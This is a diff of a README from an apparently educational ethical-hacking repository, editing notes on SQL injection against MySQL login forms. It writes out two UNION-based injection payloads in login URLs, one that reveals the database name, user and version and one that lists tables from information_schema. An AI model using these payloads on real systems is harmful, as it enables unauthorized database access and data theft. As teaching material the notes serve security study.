RodgerOliver/ethical-hacking/README.md

 `https://page.com/login.php?username=hello' UNION SELECT 1,database(),user(),version(),5 %23&password=world`

-These function will retrieve the current database, user and version of the database.
+These function will retrieve the current database, user and version of the database respectively.

 #### Find Database Tables

-When the `UNION` operator is been used all columns have to be filled up in the `SELECT` statement, so to retrieve information set the other to `null`.

 The `information_schema` database is a default database created by MySQL and it contains information about all other databases.

+To get all the tables from that database perform:

 `https://page.com/login.php?username=hello' UNION SELECT null,table_name,null,null,null from information_schema.tables %23&password=world`